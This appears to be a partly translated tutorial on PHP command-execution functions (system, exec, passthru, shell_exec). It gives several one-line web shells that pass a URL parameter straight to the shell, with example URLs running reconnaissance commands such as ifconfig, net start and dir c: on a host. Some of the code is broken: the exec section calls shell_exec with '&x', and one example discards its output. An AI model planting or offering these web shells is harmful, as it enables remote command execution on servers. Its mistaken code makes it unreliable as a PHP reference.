The following php command execution function can execute external applications or functions:
1. The system executes an external application and outputs the results
原型:string system(String command, int &return_var)
command is the command to be executed, and return_var stores the status value after execution of the executed command.
<?php
$cmd=$_GET["c"];
echo "<pre>";
system($cmd);
echo "</pre>";
?>
Access this PHP file in the browser and submit the cmd content as net start to see which services are enabled on the web server host
http://xx.com/x.php?c=ifconfig
http://xx.com/x.php?c=net start
http://xx.com/x.php?c=Command
http://xx.com/x.php?c=dir c:
2. Exec executes an external application
原型:string exec(String command,array &output,int &return_var)
command is the command to be executed, output is to get each line of string output by the execution command, and return_var stores the status value after executing the command.
<?php
$x=$_GET["x"];
echo shell_exec(&x);
?>
3. passthru executes a UNIX system command and displays the original output
原型:void passthru(string command,int &return_var)
<?php
$cmd=$_GET["cmd"];
echo "<pre>";
passthru($cmd);
echo "</pre>";
?>
4. shell_exec executes the shell command and returns the output string
Prototype: string shell_exec (string command)
<?php
$cmd=$_GET["cmd"];
echo "<pre>";
shell_exec($cmd);
echo "</pre>";
?>
5. The "''" operator: the same function as the shell_exec function